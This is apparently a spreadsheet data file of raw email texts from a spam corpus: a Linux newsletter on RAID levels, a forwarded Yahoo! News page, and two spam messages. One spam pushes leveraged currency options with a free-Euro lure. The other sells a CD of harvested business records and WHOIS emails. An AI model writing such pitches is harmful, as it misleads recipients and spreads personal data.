 RAID-1, unlike Linear and RAID-0, &lt;i&gt;does&lt;/i&gt; provide data redundancy. This is the first level in which data is "mirrored" across the drives in the RAID array. All data that exists on one drive exists on all the others. RAID-1 requires at least two drives and they should be of equal size, otherwise, your overall RAID array will be the size of the smallest drive. Performance with RAID-1 can actually be slower than with a single drive or RAID-0, as all the data is written across multiple discs.&lt;p&gt;
 RAID-4 is, for the most part, pretty useless. It reserves one disc for &lt;a href="http://wombat.doc.ic.ac.uk/foldoc/foldoc.cgi?query=parity" target="_blank"&gt;parity&lt;/a&gt; information while striping the data across the others. This is much like Linear mode, with an additional disc thrown in for parity data. Parity data &lt;i&gt;can&lt;/i&gt; be used to reconstruct and retrieve the data on the other drives, but this really isn't a redundant method of data storage. Consequently, RAID-4 is probably the least used of the RAID schemes.&lt;p&gt;
 RAID-5 is designed for 3 or more discs and provides both redundancy and speed. Like RAID-4, RAID-5 pays close attention to parity data. However, rather than reserving a device in the RAID array for this data, it's written across the array. Because the parity data is written across the array, data recovery can be accomplished fairly quickly. In fact, using a "spare disc" configuration will allow RAID-5 to reconstruct the data to the spare disc immediately after the failure of a drive. Because of it's increased speed and redundancy, RAID-5 is probably the most common setup for multiple storage devices.&lt;p&gt;
 With all that in mind, you'll need to make a choice in your kernel configuration. Do you have mutliple drives of the same size that you'd like to configure as a RAID array? The Multi-Device Support section of the kernel configuration will allow you to do this. In fact, you'll be able to set the RAID level, as well. Again, evaluate your needs and select the appropriate option.&lt;p&gt;
 Tomorrow, it's on to networking options in your kernel configuration.&lt;p&gt;&lt;p&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" 
 href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;br&gt;
 &lt;span align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="mailto:tony@lockergnome.com?subject=GnomeCORE"&gt;Send us a GnomeCORE tip&lt;/a&gt;&lt;/span&gt;
 &lt;!-- FILE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#C0C0C0" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p 
 class="title"&gt;&amp;nbsp;GnomeFILE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;SaveMyModem&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://web.genie.it/utenti/g/gareuselesinge/smm/"&gt;http://web.genie.it/utenti/g/gareuselesinge/smm/&lt;/a&gt;&lt;p&gt;
 "SaveMyModem is an anti-spam, mail-shaping, and delete-on-server mail tool. It is designed for users with slow dialup connections, who are tired of downloading large amounts of spam and worm and virus attachments."&lt;p&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" 
 href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;br&gt;
 &lt;span align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="mailto:tony@lockergnome.com?subject=GnomeFILE"&gt;Send us a GnomeFILE suggestion&lt;/a&gt;&lt;/span&gt;
 &lt;!-- VOICE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#C0C0C0" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p 
 class="title"&gt;&amp;nbsp;GnomeVOICE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Windows Apps in Linux?&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Robert Nix&lt;/span&gt;&lt;p&gt;
 "Nice coverage but I don't give a flip about Office. OpenOffice is fine
 for my needs.&lt;p&gt;
 "What I really want is to run Quicken (at least v.2001) which is the only
 app keeping me running Windows (using vmware). I've tried Quicken on Mac
 OS X and it is grossly inadequate and on Linux with Wine and have so far
 been unsuccessful even using tips from
 http://appdb.codeweavers.com/appview.php?appId=107. I hope that GnuCash
 will eventually support the online features I enjoy but that doesn't
 help now.&lt;p&gt;
 "The reason I'm writing this is that I personally think Office products
 are overrated for home users, at least now that there are several native
 alternatives. For home users, finance apps are the key issue now. Do a
 section on getting Quicken to run in Wine and I'll declare you a god. :)"&lt;p&gt;&lt;p&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" 
 href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;br&gt;
 &lt;span align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="mailto:tony@lockergnome.com?subject=GnomeVOICE"&gt;Speak your GnomeVOICE&lt;/a&gt;&lt;/span&gt;
 &lt;!-- CLICK --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#C0C0C0" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p 
 class="title"&gt;&amp;nbsp;GnomeCLICK&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Important Unix Manpages&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://home.ins.de/~m.hussmann/man/"&gt;http://home.ins.de/~m.hussmann/man/&lt;/a&gt;&lt;p&gt;
 Manpages are an important part of Linux use. Armed with the proper knowledge and manpage, there are few sticky situations in Linux that can't be solved quickly. Though they can be a bit cryptic at times, manpages are really a Linux newbie's best friend.&lt;p&gt;
 Important Unix Manpages is a compilation of help for situations that actually have little to do with programming. They're more human interface problems than machine interface problems. This page just points out that if life was like Linux, we'd all be a lot happier.&lt;p&gt;&lt;p&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" 
 href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;br&gt;
 &lt;span align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="mailto:tony@lockergnome.com?subject=GnomeCLICK"&gt;Suggest a GnomeCLICK&lt;/a&gt;&lt;/span&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" 
 size="1"&gt;
 &lt;a 
 href="http://www.lockergnome.com/issues/penguinshell/20020716.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020716.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To unsubscribe or change your delivery address, please 
 visit the &lt;A HREF="http://www.lockergnome.com/changesub.html"&gt;subscription management&lt;/A&gt;
 page. Use of the Gnome moniker by Penguin Shell does not imply endorsement of the Gnome Desktop Environment. Penguin 
 Shell is an equal-opportunity desktop employer. For further information, please refer to the GnomeCREDITS in the 
 sidebar.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--#include virtual="/include/subscription2.txt" --&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td background="http://images.lockergnome.com/images/issue/sidebar.gif" 
 VALIGN="top" align="left" width="145"&gt;&lt;font style="font-size: 8pt" 
 color="#990000"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&lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" 
 src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" 
 height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About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&amp;nbsp;&lt;A HREF="http://www.tvcd.biz/lockergnome"&gt;Win a Digital Camera&lt;/A&gt;&lt;br&gt;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HREF="http://chris.pirillo.com/"&gt;Chris's Blog&lt;/A&gt;&lt;BR&gt;
 &amp;nbsp;&lt;a href="mailto:tony@lockergnome.com?subject=Lockergnome Penguin Shell 
 Comment"&gt;E-mail the Editor&lt;/a&gt;&lt;br&gt;
 &lt;!-- GNOME CERTIFICATION --&gt;
 &lt;!-- END GNOME CERTIFICATION --&gt;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&lt;p&gt;
 &lt;!--#include virtual="/include/subscribeside.txt" --&gt;
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/.WMV"&gt;&lt;/a&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table align="center" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/steidler.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Is your nest egg cracking? 2617iWcH6-263-12
</t>
  </si>
  <si>
    <t xml:space="preserve">On January 1st 2002, the European countries began
 using the new Euro.  Never before have so
 many countries with such powerful economies united
 to use a single currency.  Get your piece of history
 now!  We would like to send you a FREE Euro
 and a FREE report on world currency.  Just visit
 our site to request your Euro and Euro report:
 http://www282.wiildaccess.com
 In addition to our currency report, you can receive
 our FREE INVESTMENT PACKAGE:
 *Learn how $10,000 in options will leverage $1,000,000 in
 Euro Currency. This means even a small movement in the market
 has huge profit potential.
 If you are over age 18 and have some risk capital, it's
 important that you find out how the Euro will
 change the economic world and how you can profit!
 $10,000 minimum investment
 Please carefully evaluate your financial position before
 trading.  Only risk capital should be used.
 http://www282.wiildaccess.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To "Opt-Out":
 http://www282.wiildaccess.com/optout.html
 0869rJKU9-021Irsi848l19
 4277RtxO1-887Zecb8252kxVB8-521HKCX9386Mbpg6-812PqeJ6560NlfV1-018yhmw1788ZOTh2-726Gl77
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 17 mln US Businesses on CD ++
</t>
  </si>
  <si>
    <t xml:space="preserve">We offer a product that will let you develop a customer base for your business in no time. We have compiled information over the Internet on every US business. One single CD contains data on 12 million US companies - sorted by Yellow Pages Categories and SIC Codes.
 Accuracy? Freshness? We have sold thousands of CDs, and haven't had one complaint. We are committed to deliver the best quality data that is highly rewarding to your business. How?
 - Fill out your address book with every company related to your business.
 - Select companies within your area, or across the whole USA.
 - Create a web site - just put our data in HTML format.
 - Thinking big? Create your own complete USA Yellow Pages Web Site.
 - Compare and update your old database with our CD. Keep it fresh.
 - Promote your products and services, send out your brochures and catalogs.
 There are endless possibilities how to use the CD.
 As a bonus we include complete information on 5 mln US Domain Names Owners with email addresses from WHOIS databases. Each record contains the following data: Domain Name, Company Name, Registrant Name, Registrant Email, Registrant Address, Phone and Fax numbers.
 The CD comes with the software that allows you to import data into your database in 1-2-3 easy steps. Unlimited usage, no restrictions on importing data into your database. Format: ASCII comma separated ","
 The Price is $349.00 ONLY!!! Free Shipping. Same Day Shipping.
 We are accepting credit card or check orders. Call us to place the order, or complete the form below, print and fax the form, or mail it to the address below.
 ORDER LINE: 1-786-258-2394
 VIA FAX: 1-954-563-6949
 OR MAIL TO:
 0-0 DataNetwork
 2805 E. Oakland Park Blvd., #406
 Fort Lauderdale, FL 33306 USA
 * * * Please copy and paste form order, fill out, print, sign, and mail or fax to us.
 Please Send Me "US BUSINESSES &amp; US DOMAINS CD" for $349.00 (US) plus s/h.
 *Name:
 *Company Name:
 *Shipping Address:
 *City:
 *State/Province:
 *Postal Code:
 *Country:
 *Telephone:
 *Fax:
 *E-mail Address:
 Card Type: MasterCard [ ] Visa [ ] AmEx [ ] Discover [ ]
 *Credit Card Number:
 *Expiration Date:
 *Shipping/Handling: $Free - in the USA, $25.00 - Overnight [ ]; Overseas [ ]; C.O.D. [ ].
 *TOTAL ORDER: $
 *I authorize "0-0 DataNetwork" to charge my credit card for 'US BUSINESSES &amp; US DOMAINS CD' in the amount of $__________ .
 *Date:                                                   *Signature:
 *Name as appears on Card:
 *Billing Address:
 *City, State &amp; Postal Code:
 =========================================================
 We apologize if this message was intrusive.
 We guarantee you will never again hear from us.
 Just click here to be removed &lt;a href="mailto:abl1l1l231ink@btamail.net.cn?Subject=Remove"&gt;REMOVE&lt;/a&gt; or reply back with Subject REMOVE.
 Thank You.
 * * *
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Yahoo! News Story - Top Stories
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;&lt;base href="http://story.news.yahoo.com"&gt;&lt;/base&gt;
 &lt;script language=javascript type=text/javascript src="http://us.js1.yimg.com/us.yimg.com/lib/cmrc/tare.js"&gt;&lt;/script&gt;
 &lt;link rel=StyleSheet href="http://story.news.yahoo.com/css/user.css" type="text/css"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=ffffff&gt;
 &lt;font SIZE="2" FACE="Arial,Helvetica"&gt;
 &lt;b&gt;Gary Murphy (garym@canada.com)&lt;/b&gt; has sent you a news article. (Email address has not been verified.)
 &lt;p&gt;
 &lt;b&gt;Personal message:&lt;/b&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;i&gt;Top Stories&lt;/i&gt;&lt;br&gt;
 &lt;a href="http://story.news.yahoo.com/news?tmpl=story2&amp;u=/020928/161/2c9nb.html"&gt;http://story.news.yahoo.com/news?tmpl=story2&amp;u=/020928/161/2c9nb.html&lt;/a&gt;
 &lt;/font&gt;
 &lt;hr size=0 width="80%"&gt;
    &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;
 Yahoo! News - Top Stories
 &lt;/title&gt;
 &lt;script type="text/javascript" src="http://us.js1.yimg.com/us.yimg.com/lib/common/yg_csstare.js"&gt;&lt;/script&gt;
 &lt;style&gt;
 &lt;!--/**/.whitebg { background-color:#ffffff }
 a:visited { color:#990099; }
 a.regs { font-weight:normal; font-size:8pt } 
 a.regb { font-weight:bold }
 a.topstory { font-weight:bold; font-size:12pt; line-height:100% }
 a.leftcolindent { font-weight:bold; margin-left:12px }
 a.regblk { color:#000000 }
 a.regblkb { font-weight:bold; color:#000000 }/**/.regb { font-weight:bold }/**/.regs { font-weight:normal; font-size:8pt }/**/.regl { font-size:12pt; color:#ffffff }/**/.reglb { font-weight:bold; font-size:12pt; color:#ffffff }/**/.regblk { color:#000000 }/**/.regsblk { font-weight:normal; font-size:8pt; color:#000000 }/**/.regblkb { font-weight:bold; color:#000000 }/**/.reglblkb { font-weight:bold; font-size:12pt; color:#000000 }/**/.timedate { font-weight:normal; font-size:8pt; color:#999999 }/**/.sectiontitle { font-weight:bold; font-size:12pt; color:#000000; vertical-align:middle; background-color: #a7b6d2 }/**/.sectiontitled { font-weight:bold; font-size:12pt; color:#ffffff; vertical-align:middle; background-color: #48669f }/**/.sectiontitlel { font-weight:bold; font-size:12pt; color:#ffffff; vertical-align:middle; background-color: #a7b6d2 }/**/.sectiontitles { font-weight:normal; color:#ffffff; vertical-align:middle; background-color: #a7b6d2 }/**/.sectiontitlesb { fon
  t-weight:bold; color:#ffffff; vertical-align:middle; background-color: #a7b6d2 }/**/.welcome { color:#000000; background-color:#cccccc }/**/.leftcolumn { color:#000000 ; vertical-align:top; background-color:#e4ecf6 }/**/.leftcolumnmain { background-color:#e4ecf6 }/**/.articletitle { font-weight:bold; font-size:12pt; color:#000000; vertical-align:top; line-height:100%}/**/.article { color:#000000 ; vertical-align:top }/**/.storyheadline { font-weight:bold; font-size:14pt; color:#000000; line-height:100% }
 --&gt;
 &lt;/style&gt;&lt;/head&gt;
 &lt;body bgcolor=white&gt;
 &lt;center&gt;
 &lt;table cellpadding=2 cellspacing=0 BORDER=0 width=750&gt;
 &lt;tr valign=top&gt;&lt;td&gt;
 &lt;table cellpadding=2 cellspacing=0 BORDER=0 width=100%&gt;
 &lt;tr valign=middle&gt;
 &lt;td width=1%&gt;
 &lt;!-- robot ads1 --&gt;&lt;/TD&gt;
 &lt;td width=1%&gt;
 &lt;/td&gt;
 &lt;TD nowrap align=right width=97%&gt;&lt;A href="http://dailynews.yahoo.com/h/?u"&gt;&lt;FONT face=arial size=2&gt;News Home&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=arial size=2&gt; - &lt;A href=http://www.yahoo.com&gt;Yahoo!&lt;/A&gt; - &lt;A href=http://help.yahoo.com/help/news/&gt;Help&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;
 &lt;HR size=1 noshade&gt;&lt;/TD&gt;
 &lt;td width="1%"&gt;
 &lt;a href="http://rd.yahoo.com/dailynews/reuters/brand/*http://www.reuters.com"&gt;
 &lt;img src="http://us.i1.yimg.com/us.yimg.com/i/dn/reuters5.gif" border=0 alt="Reuters" width=137 height=30&gt;&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=750 border=0 cellpadding=5 cellspacing=0 height=100&gt;
 &lt;tr valign=middle&gt;
 &lt;td align="center"&gt;
 &lt;nolayer&gt;
 &lt;iframe
 src="http://adserver.yahoo.com/a?f=12790524&amp;p=news&amp;l=N&amp;c=hs&amp;bg=ffffff"
 marginwidth=0 marginheight=0 hspace=0 vspace=0 width=740 height=100
 frameborder=0 scrolling=no&gt;
 &lt;/iframe&gt;
 &lt;/nolayer&gt;
 &lt;ilayer
 src="http://adserver.yahoo.com/a?f=12790524&amp;p=news&amp;l=N&amp;c=hs&amp;bg=ffffff"
 bgcolor="#ffffff" width=470 height=80&gt;
 &lt;/ilayer&gt;
 &lt;!-- MTFSID 0:2718085:7645365:7663531:7666521:12790524 --&gt;
 &lt;!-- NB: 0:2718085:7645365:39780830 --&gt;
 &lt;!-- NBT: 0:2718085:7645365:39780830:39780837:39780856:39780843 --&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=750 cellpadding=3 cellspacing=0 border=0&gt;
 &lt;tr&gt;
 &lt;td class=welcome&gt;&lt;span class=reglblkb&gt;Welcome, Guest&lt;/span&gt;&lt;/td&gt;
 &lt;td class=welcome align=right&gt;
 &lt;a href="http://rd.yahoo.com/dailynews/front/welcome/cst/*http://edit.news.yahoo.com/news?tmpl=s&amp;u=/static/customize/set_content&amp;.done=http%3a//news.yahoo.com/%3ftmpl=story2%26u=/020928/161/2c9nb.html"&gt;&lt;b&gt;Personalize News Home Page&lt;/b&gt;&lt;/a&gt;
 &lt;img alt=New src=http://us.i1.yimg.com/us.yimg.com/i/new2.gif border=0 width=28 height=11&gt;&amp;nbsp;
 -
 &amp;nbsp; 
 &lt;a href="http://rd.yahoo.com/dailynews/front/welcome/signin/*http://edit.yahoo.com/config/login?.src=yn&amp;.done=http%3a//news.yahoo.com/%3ftmpl=story2%26u=/020928/161/2c9nb.html"&gt;Sign In&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=750 cellpadding=3 cellspacing=0 border=0 class=sectiontitled&gt;
 &lt;tr valign=bottom&gt;
 &lt;td class=sectiontitled valign=bottom&gt;
 &lt;span style="font:bold 14pt arial"&gt;Yahoo! News&lt;/span&gt; &amp;nbsp; &lt;span class=regs&gt;
 Sun, Sep 29, 2002
 &lt;/span&gt;&lt;/td&gt;
 &lt;td align=right nowrap valign=bottom&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;&lt;tr valign=middle&gt;
 &lt;form action="http://search.news.yahoo.com/search/news"&gt;
 &lt;td valign=bottom&gt;
 &lt;/td&gt;
 &lt;td nowrap class=sectiontitled valign=bottom&gt;&lt;span class=regs style="font-weight:bold"&gt;Search&lt;/span&gt;&lt;/td&gt;
 &lt;td nowrap class=sectiontitled&gt;&amp;nbsp;&lt;select name=c&gt;&lt;option value=&gt;News Stories&lt;option value=news_photos selected&gt;News Photos&lt;option value=av&gt;Audio/Video&lt;option value=fullcov&gt;Full Coverage&lt;option value=news_nytp&gt;The New York Times&lt;option value=all&gt;All of Yahoo!&lt;/select&gt;&lt;/td&gt;&lt;td nowrap class=sectiontitled&gt;&amp;nbsp;&lt;span class=regs&gt;for&lt;/span&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap valign=bottom&gt;&lt;input size=15 name=p value=""&gt;&amp;nbsp;&lt;input type=submit value="Search"&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/form&gt;
 &lt;td class=sectiontitled valign=bottom&gt;&amp;nbsp;&lt;a class=regs href="http://search.news.yahoo.com/search/news/options?p="&gt;&lt;font face=arial size=-2 color=ffffff&gt;Advanced&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=100% border=0 cellpadding=0 cellspacing=0&gt;&lt;tr&gt;&lt;td height=8&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=750 border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr valign=top&gt;
 &lt;td class=leftcolumnmain width=160&gt;
 &lt;table width=100% cellpadding=0 cellspacing=4 border=0&gt;
 &lt;tr&gt;&lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href="/news?tmpl=s&amp;u=/static/homepage"
  class=regb&gt;News Front Page&lt;/a&gt;
  &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt;
  &lt;/td&gt;
  &lt;td&gt;
 &lt;a href=/news?tmpl=index2&amp;cid=702 class=regb&gt;News Photos&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
 &lt;img src=http://us.i1.yimg.com/us.yimg.com/i/sr/ar.gif
  width=8 height=9&gt;
  &lt;a href="/news?tmpl=index2&amp;cid=705" class=regb&gt;Top Stories&lt;/a&gt;
  &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href=/news?tmpl=index2&amp;cid=708 class=leftcolindent&gt;World&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href=/news?tmpl=index2&amp;cid=707 class=leftcolindent&gt;Entertainment&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href=/news?tmpl=index2&amp;cid=706 class=leftcolindent&gt;Sports&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href=/news?tmpl=index2&amp;cid=832 class=leftcolindent&gt;Science&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href=/news?tmpl=index2&amp;cid=1007 class=leftcolindent&gt;Lifestyle&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
 &lt;a href="/news?tmpl=index2&amp;cid=27" class=leftcolindent&gt;Politics&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
 &lt;a href=/news?tmpl=s&amp;u=/h/slideshow2/index class=leftcolindent&gt;Slideshows&lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href="/news?tmpl=index2&amp;cid=441" class=leftcolindent&gt;Editors' Picks&lt;/a&gt;
  &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=1%&gt; &lt;/td&gt;
  &lt;td&gt;
  &lt;a href="/news?tmpl=index2&amp;cid=996" class=leftcolindent&gt;Most Popular&lt;/a&gt;
  &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td class=sectiontitled nowrap&gt;Slideshows&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td&gt;
 &lt;center&gt;&lt;a href='javascript:
  rs("ss","http://story.news.yahoo.com/news?p=news&amp;g=events/ts/081202sept11&amp;e=1&amp;tmpl=sl&amp;nosum=0&amp;large=0&amp;t=1033307900", 750,580);'&gt;&lt;img border=1 align="MIDDLE" width=130 height=85 src="http://us.news1.yimg.com/us.yimg.com/p/rids/20020929/t/1033307900.3892387931.jpg" alt="Photo"&gt;&lt;/a&gt;
  &lt;br&gt;&lt;a href='javascript: rs("ss","http://story.news.yahoo.com/news?p=news&amp;g=events/ts/081202sept11&amp;e=1&amp;tmpl=sl&amp;nosum=0&amp;large=0&amp;t=1033307900",750,580);'&gt;Sept. 11 Attacks &amp; Terrorism Slideshow&lt;/a&gt;&lt;/center&gt;
 &lt;span class=regsblk&gt;A Jordanian youth tours on a camel through the ancient city of Petra in Jordan, September 29, ...&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td width=1%&gt;&lt;b&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=99%&gt;
 &lt;a href='javascript: rs("ss",
 "http://story.news.yahoo.com/news?p=news&amp;g=events/ts/080601mideast&amp;e=1&amp;tmpl=sl&amp;nosum=0&amp;large=0&amp;t=1033307429",750,580);' class=regs&gt;Mideast Conflict&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td width=1%&gt;&lt;b&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=99%&gt;
 &lt;a href='javascript: rs("ss",
 "http://story.news.yahoo.com/news?p=news&amp;g=events/ts/092802senegalferry&amp;e=1&amp;tmpl=sl&amp;nosum=0&amp;large=0&amp;t=1033304349",750,580);' class=regs&gt;Ferry Capsizes Off W. Africa&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td width=1%&gt;&lt;b&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=99%&gt;
 &lt;a href='javascript: rs("ss",
 "http://story.news.yahoo.com/news?p=news&amp;g=events/ts/092702beirut&amp;e=1&amp;tmpl=sl&amp;nosum=0&amp;large=0&amp;t=1033155159",750,580);' class=regs&gt;Thousands Mark Palestinian Uprising in Beirut&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td width=1%&gt;&lt;b&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=99%&gt;
 &lt;a href='javascript: rs("ss",
 "http://story.news.yahoo.com/news?p=news&amp;g=events/ts/092702malaysia&amp;e=1&amp;tmpl=sl&amp;nosum=0&amp;large=0&amp;t=1033131364",750,580);' class=regs&gt;Malaysia Police Arrest Militant Leader&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;
 &lt;a
 href="/news?tmpl=s&amp;u=/static/slideshow_archive2&amp;ga=ts" class=regs&gt;More Top Stories Photos Slideshows&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;
 &lt;/td&gt;
 &lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td width=585 class=article&gt;
 &lt;table width=100% cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td class=sectiontitle&gt;Top Stories&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=100% border=0 cellpadding=0 cellspacing=0&gt;&lt;tr&gt;&lt;td height=8&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;center&gt;
 &lt;br&gt;
         &lt;table width=100% cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr valign=middle&gt;
 &lt;td&gt;&lt;center&gt;
 Prev. 
 | 
 &lt;a href="http://rd.yahoo.com/dailynews/prevnext/photos/start/*http://story.news.yahoo.com/news?tmpl=index2&amp;cid=23"&gt;Start&lt;/a&gt;
 | 
 &lt;a href="http://rd.yahoo.com/dailynews/prevnext/photos/next/*http://story.news.yahoo.com/news?tmpl=story2&amp;u=/020929/161/2cf6p.html&amp;e=1&amp;ncid="&gt;Next&lt;/a&gt;
